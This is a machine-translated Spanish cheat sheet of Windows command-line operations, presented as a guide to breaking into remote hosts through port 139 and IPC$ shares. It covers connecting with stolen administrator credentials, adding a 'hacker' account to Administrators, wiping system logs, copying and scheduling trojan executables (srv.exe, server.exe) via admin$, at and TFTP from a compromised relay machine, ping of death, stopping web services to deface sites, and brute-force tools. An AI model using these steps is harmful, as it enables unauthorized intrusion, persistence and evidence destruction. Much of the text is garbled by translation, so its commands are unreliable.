¿Cómo conectarse a un host remoto mediante el comando DOS y cómo controlarlo después de la conexión?
net usa \\ip\ipc$ "contraseña"
/usuario: "nombre de usuario"
Crear un nuevo usuario
Red Nombre de usuario y contraseña/Agregar
Cambiar contraseña de usuario
Red
Nombre de usuario y nueva contraseña
Activar usuario
Nombre de usuario del usuario de red
/Activo: Sí
Agrega el usuario al grupo de usuarios.
nombre del grupo local de red nombre de usuario
/Agregar
Ver la hora del host remoto
Tiempo neto\\ip
Muestra la * * * lista de recursos compartidos del host remoto.
Vista de red
\\ip
Iniciar y detener servicios del sistema
Nombre del servicio de inicio (detención) de red
Asignar el disco duro de la otra parte
Uso neto z:
\\ip\c$
Iniciador
En \\ Programa ip Time
Archivar original
Copiar nombre de archivo
\\ip\c$\filename
Ejecución remota de comando FTP p >
echo nombre de servidor abierto & gtc:\ftp.txt
Echo
Nombre de usuario& gt& gtc:\ftp.txt
Contraseña de eco& gt& gtc: \ftp.txt
echo get
Nombre de archivo c:\ nombre de archivo & gt;& gtc:\ftp.txt
ftp -s: c:\ ftp.txt
Triángulo invertido
c:\ftp.txt
Eliminar registro
del c:\ win nt \system32\ archivos de registro\*. *
Triángulo invertido
c:\win nt\s system 32\config\*. Temperatura de isoviscosidad
del c:\winnt\system32\dtclog\*. *
Triángulo invertido
c:\winnt\system32\*. log
del c:\winnt\system32\*. Archivo de texto (textfile)
del c:\winnt\*. Archivo de texto (textfile)
del c:\winnt\*. Registros
Visítense * * * para disfrutar de los recursos.
Uso de red\\192.168.1.1\c$
/Usuario:admin "123"
Si la conexión es exitosa, estás ingresando.
Inicio\\192.168.1.1\c$
Abra la unidad c de la máquina de destino.
-
net usa \\ip\ipc$ " "
/user:" " para establecer un enlace IPC vacío.
Net utiliza \\ip\ipc$ "contraseña" /usuario:"nombre de usuario" para establecer un enlace ipc no vacío.
Uso de red
H: \\ip\c$ "contraseña"/usuario: "nombre de usuario" para iniciar sesión directamente, asignado al C: local de la otra parte, que es H :
net usa h: \\ip\c$
para mapear a la otra parte después de iniciar sesión. C: H:
Net usa \\ip\ipc$ /del para eliminar el enlace ipc.
Net use h: /del
Use H: para eliminar la asignación del socio mapeado al socio local.
Nombre de usuario y contraseña de red/Agregar para crear un usuario.
Usuario de Red Invitado/Actividad: Sí
Activar Usuario Invitado
Usuario de Red para ver qué usuarios hay allí.
Nombre de la cuenta de usuario de Net para ver las propiedades de la cuenta.
Grupo local de red
Nombre de usuario del administrador/Agregar Agregue "usuario" a Administradores para que tenga derechos de administrador. Nota: agregue la s plural después de administrador.
Red
Empiece a ver qué servicios están activados.
El nombre del servicio de inicio de red inicia el servicio (por ejemplo, inicio de sesión remoto de la red, programación de inicio de la red)
El nombre del servicio de parada de red detiene el servicio.
Tiempo neto \\IP de destino verifica el tiempo de la otra parte.
Tiempo neto\\IP de destino/Grupo
Establezca la hora de la computadora local que se sincronizará con la hora del host "IP de destino" y agregue el parámetro /yes para cancelar la confirmación. mensaje.
Ver qué * * * privilegios están habilitados en la LAN local.
Red
Ver \\ip para ver qué * * * permisos están habilitados en la LAN de la otra parte.
Configuración de red muestra la configuración de red del sistema.
Desconexión de red sin conexión* * *Disfrutar
Red
Suspender nombre del servicio Suspender el servicio.
Net send ip "SMS" envía un mensaje a la otra parte.
Tipo de conexión de red e información de la red.
Comparte en línea para ver el disfrute * * * local.
Net share ipc$ está abierto a ipc$*** para su disfrute.
Partición neta ipc$ /del
Eliminar ipc$***
Partición neta c$ /del eliminar c:* * * *Disfruta.
Invitado internauta 12345
Después de iniciar sesión como usuario invitado, cambie la contraseña a 12345.
La contraseña de red cambia la contraseña de inicio de sesión del sistema.
netstat -a
Comprueba qué puertos están abiertos, normalmente netstat -an.
Netstat -n comprueba la conexión de red del puerto, normalmente netstat -an.
netstat -v
Ver el trabajo en curso
netstat -p ejemplo de nombre de protocolo: netstat -p tcq/ip Ver el uso del protocolo (ver el uso del protocolo tcp/IP ).
Netstat -s muestra el uso de todos los protocolos en uso.
nbtstat -A ip
Si uno de los puertos 136 a 139 de la otra parte está abierto, puede verificar el nombre de usuario que inició sesión más recientemente (nombre de usuario anterior a 03) - Nota: El parámetro -A debe estar en mayúscula.
Parámetro Tracert
Ruta de seguimiento de IP (o nombre de computadora) (paquete). Parámetro: "-w número" se utiliza para establecer el intervalo de tiempo de espera.
Ping ip (o nombre de dominio)
Envía datos con un tamaño predeterminado de 32 bytes al otro host y el parámetro es "-l[espacio]tamaño de paquete"; -n veces para enviar datos"; "-t" significa hacer ping todo el tiempo.
Ping -t -l
65550 ip ping of death (envía archivos de más de 64K, el ping continuamente se convierte en ping of death)
Para Windows Ipconfig (winipcfg )
NT y XP (Windows 95 98) ven la dirección IP local, ipconfig puede usar el parámetro "/all" para mostrar toda la información de configuración.
tlist -t
Muestra el proceso en una lista de líneas de árbol (como herramienta adicional del sistema, no se instala por defecto y se encuentra en la carpeta Soporte/herramientas del directorio de instalación).
Nombre del proceso de terminación
Forzar la finalización de un proceso después de agregar el parámetro -F (es una herramienta adicional del sistema, no se instala por defecto y se encuentra en el soporte/herramientas). carpeta del directorio de instalación).
Nombre del archivo
Después de agregar el parámetro -F, los archivos de solo lectura se pueden eliminar. /AR, /AH, /AS y /AA significan eliminar archivos de solo lectura, ocultos, del sistema y de almacenamiento, respectivamente. /A-R, /A-H, /A-S y /A-A significan eliminar archivos excepto archivos de solo lectura, ocultos, del sistema y de archivo. Por ejemplo, "DEL/AR"
*.* "significa eliminar todos los archivos de sólo lectura en el directorio actual", DEL/A-S *. * "significa eliminar todos los archivos en el directorio actual excepto los archivos del sistema.
#2 Segundo:
Directorio de entrega/ventas/calidad
O use: rmdir /s /Q directorio /S elimina el directorio y todos los subdirectorios y archivos que contiene. Al mismo tiempo, use el parámetro /Q para cancelar la operación de eliminación y elimínelo directamente después de que el sistema lo confirme (los dos comandos tienen el mismo efecto).
Mueva la letra de unidad\ruta\ruta para almacenar el nombre del archivo que se va a mover\Después de mover el nombre del archivo, use el parámetro /y para cancelar el mensaje y confirme que el mismo archivo existe en el directorio movido. y sobrescríbalo directamente
Football Club. (Football Club)
one txt two 3t.txt Compara dos archivos y genera las diferencias en archivos 3t.txt. ">" y ">"
<. p>Este es un comando de redirecciónAbra la tarea programada registrada en el número de identificación.
En /delete detiene todas las tareas programadas. Utilice el parámetro /yes para detenerlas directamente sin confirmación.
Detener la tarea programada registrada en
Número de identificación/eliminar.
Ver todas las tareas programadas.
En \\ip time nombre del programa (o comando)/r
Ejecute un programa de la otra parte en un momento determinado y reinicie la computadora.
Presiona nombre de usuario @host para ver qué usuarios han iniciado sesión recientemente.
Puerto IP Telnet
Servidor de inicio de sesión de Yuanhe, el puerto predeterminado es 23.
Abra ip connect to IP (comando después de iniciar sesión en telnet)
Escriba directamente en esta computadora.
Entrará al telnet de esta máquina.
Copia ruta\nombre de archivo1 ruta\nombre de archivo2 /y
Copie el archivo 1 como archivo 2 en el directorio especificado y sobrescriba el archivo del directorio existente cuando desee. Utilice el parámetro /y para cancelar la confirmación. .
Copia el archivo c:\srv.exe \\ip\admin$
Copia el c:\srv.exe local al administrador de la otra parte.
cppy 1st .jpg/b+2st . txt/a 3st.jpg
Oculta el contenido de 2st.txt en 1st.jpg y genera un nuevo archivo en 0st.jpg. Nota: El encabezado del archivo 2st.txt debe tener tres líneas vacías. Parámetros: /b se refiere al archivo binario, /a se refiere al archivo en formato ASCLL.
copiar\\IP\admin$\svv.exe c:\ o:copiar\\IP\admin$\*. *
Copie los archivos srv.exe (todos los archivos) propiedad de otros administradores$*** al C local:
Xcopiar archivo o dirección de destino del árbol de directorios\nombre del directorio
p>Copia archivos y árboles de directorios y sobrescribe archivos idénticos sin solicitar el parámetro /y.
TFTP: mi propia IP (cuando use una máquina de carne como trampolín, use la IP de la máquina de carne) para obtener server.exe.
Después de iniciar sesión en C:\server.exe, descargue el server.exe de "IP" al host de destino C:\server.exe.
Parámetro: -i significa enviar en modo binario, como cuando se envía un archivo exe, o enviar en modo ASCII (modo de archivo de texto) sin usar -I.
Tftp -i peer IP put
Después de iniciar sesión con C:\server.exe, cargue el c:\server.exe local en el host.
Puerto ftp ip
Se utiliza para cargar archivos al servidor o realizar operaciones con archivos. El puerto predeterminado es 21. Bin se refiere a la transmisión binaria (entrada de archivo ejecutable), de forma predeterminada, se transmite en formato ASCII (si es un archivo de texto).
Ruta
Imprime y muestra el enrutamiento IP, mostrando principalmente la dirección de red, la máscara de subred y la dirección de la puerta de enlace.
Dirección, interfaz dirección interfaz
Arp verifica y procesa el caché ARP. ARP significa Resolución de nombres y es responsable de resolver direcciones IP en direcciones MAC físicas. alp
-a mostrará toda la información.
Inicie el nombre del programa o comando /max o /min para abrir una nueva ventana y maximizar (minimizar) ejecutar un programa o comando.
Memoria
Verificar el uso de la CPU
Nombre del archivo Attrib (nombre del directorio) para ver los atributos del archivo (directorio).
Nombre de archivo de atributo -A -R -S -H o +A +R +S
+H elimina (agrega) los atributos de archivo, de solo lectura, de sistema y ocultos de el archivo; con+ se agrega como atributo.
Directorio
Ver archivos. Parámetros: /Q muestra a qué usuario pertenecen los archivos y directorios, /T:C muestra la hora de creación del archivo, /T:A muestra la hora del último acceso al archivo y /T:W muestra la hora de la última modificación del archivo .
Fecha/Hora,
Hora/tAl utilizar este parámetro, es decir, "Fecha/T" y "Hora/T", solo se mostrará la fecha y hora actuales sin ingresar una nueva. fecha y hora.
Establecer
Especifique el nombre de la variable de entorno = el carácter que se asignará a la variable Establezca la variable de entorno.
Set muestra todas las variables de entorno actuales.
Establecer p (u otros caracteres)
Mostrar todas las variables de entorno que actualmente comienzan con el carácter p (u otros caracteres)
Pausar el programa por lotes y mostrar: Por favor presione cualquier tecla para continuar. ....
Si
Realizar procesamiento condicional en un programa por lotes (consulte el comando y las variables para obtener más instrucciones)
Ir a la etiqueta
Dirija cmd.exe a la línea etiquetada en el programa por lotes (la etiqueta debe ser una línea separada y comenzar con dos puntos, por ejemplo: etiqueta ":start").
Ruta de llamada\nombre del archivo por lotes
Llamar a otro programa por lotes desde un programa por lotes (ver llamada/?)
Para un conjunto de archivos Cada archivo se ejecuta un comando específico (consulte comandos y variables para obtener más detalles).
Echo activado o desactivado Activa o desactiva el eco, muestra la configuración actual del eco, solo eco, sin parámetros.
Los mensajes de eco muestran información en la pantalla.
Echo
Mensaje> & gtPass.txt Guarda "Mensaje" en el archivo pass.txt.
findstr "Hello" aa.txt
Busca la cadena hola en el archivo aa.txt.
Buscar nombre de archivo Buscar archivo
Título Nombre de título Cambia el nombre del título de la ventana CMD.
Valor de color
Establece los colores de primer plano y fondo de la consola cmd 0 = negro, 1 = azul, 2 = verde, 3 = verde claro, 4 = rojo, 5 = morado, 6=amarillo, 7=blanco, 8=gris, 9=azul claro, a=verde claro, B=verde claro, C=rojo claro, D=morado claro.
El nombre del mensaje cambia el símbolo del sistema mostrado por cmd.exe (cambie C:\, D:\ a: EntSky\).
Intrusión del puerto 139
Red
El comando es la parte más importante de la intrusión del puerto 139 y se utilizará muchas veces durante todo el proceso de intrusión. Ingrese net en la ventana de la línea de comando y podrá ver que hay muchos parámetros. No te dejes intimidar por tantos parámetros.
Ahora déjame explicártelo uno por uno.
NET
USE
NET
El comando se utiliza para establecer una conexión IPC$ (administración) a un host remoto. Cuando tenga el nombre de usuario y la contraseña de la computadora remota (generalmente el nombre de usuario es administrador, recuerde), ingrese net en la ventana de la línea de comando.
Utilice \\IP\IPC$"contraseña"/usuario:administrador para establecer exitosamente una conexión con la computadora remota. Entonces se podrá gestionar. Otro uso de net
use es mapear los * * * recursos compartidos de la máquina remota. Ingrese net usando z: \\IP\C$.
(¡Nota! Todos los comandos posteriores se basan en el primer comando, es decir, la conexión IPC$ debe establecerse primero antes de que estos comandos puedan tener éxito). Abra "Mi PC" y encontrará muchos de los que tengo. una unidad Z y la unidad C del host remoto está llena de cosas. Si elimina un archivo en la unidad Z, los archivos en la otra unidad C también se eliminarán. Todas las operaciones en la unidad Z son en realidad C en la computadora remota.
Operaciones en disco. ¿Qué tal? ¿No es interesante?
Vista de red
La vista de red se utiliza para ver qué recursos tiene la computadora remota. Generalmente verás el mío.
Para * * * carpetas compartidas como documentos, simplemente ingrese net view \\IP. Personalmente, no creo que Netscape
sea muy útil. Ya sabes, en Windows 2000, cada disco duro es * * * compartido, pero si usas net view para verlo, encontrarás que no hay C, D, ed y E.
* * *Disfruta de recursos como este. ¿Por qué es esto? Tenga en cuenta que en algunos de los comandos anteriores, hemos ingresado cosas extrañas como IPC$, C$ y C$. De hecho, en Windows 2000, * * los recursos con el sufijo "$" están ocultos y no se pueden ver en la ventana de la línea de comandos. En Windows 2000, todos los discos se basan en elementos como C$, D$ y E$.
Ese nombre es * * *, por lo que no podemos verlo, pero existe, al igual que IPC$.
Compartir red
El uso compartido de red se utiliza para abrir * * * e ingresar a la red.
Comparta QQ=c:\tencent, encontrará un * * * recurso adicional llamado QQ. ¿Cuál es el efecto de este comando? Supongamos que el host hace un buen trabajo en seguridad y desactiva IPC$, C$, D$.
Esperando * * * disfrute, entonces no podremos establecer una conexión de administración en el puerto 139 y no podremos acceder a la unidad c de la otra parte. Cuando ingresamos a través de otros métodos (como el desbordamiento remoto), podemos usar net share.
Abra IPC$, que se convierte en el conocido puerto de intrusión 139. El comando para abrir IPC$ es net share IPC$. En consecuencia, si desea desactivar el disfrute * * *, puede agregar el sufijo /del, como net.
La acción c$/del cierra el * * * disfrute de la unidad c.
Usuario de red
El comando net user se utiliza para administrar usuarios en el host. Solo puede ingresar net sin ningún parámetro.
Usuarios enumera todos los nombres de usuario en la computadora. Ahora veamos a los usuarios de la red.
Cómo afecta el comando a los usuarios.
┎───────────────────────────────────── ─── ── ───────────┒
┃
Usuario de red hacker 12345 /add crea un usuario llamado hacker con una contraseña de 12345.
┃
┃Usuario de red hacker /del
Eliminar el usuario llamado hacker. ┃
┃Hacker de usuario de red
/active:no desactiva el hacker de usuario. El usuario ya no puede iniciar sesión en la computadora.
┃
┃Network User Hacker
/active:yes activa usuarios hackers deshabilitados. ┃
┃Grupo local de red
Administrador Hacker/Agregar Agregar usuario hacker al grupo de administradores, es decir, mejorar los permisos del hacker y convertirlo en administrador.
┖───────────────────────────────────── ─── ── ───────────┚
Inicio de red/
Parada de red
El comando de inicio de red/parada de red se utiliza para iniciar/detener servicios del sistema. Normalmente bloquearíamos w3svc.
(Detenga el servicio web) y luego reemplace la página web. No entraré en detalles sobre este comando, sólo conócelo.
*comando at, net
Tiempo
La razón por la que se juntan es porque el comando at requiere el resultado del comando net time. Generalmente comenzamos con la vista de red.
\\ip, obtenga la hora del host remoto (suponiendo que sean las 9:00) y luego haga telnet a las 9:00 en \\IP.
Inicie el servicio Telnet y utilice el comando para ejecutar el programa de forma remota.
(5) Herramientas necesarias
Broiler Hunter v1.0 escanea un segmento de red y encuentra computadoras con contraseñas débiles.
SMBCrack
Adivinación de contraseña por fuerza bruta para un host específico.
Pantalla de operación de monitoreo del control remoto DameWare Mini
CA.exe
Clonar cuenta de administrador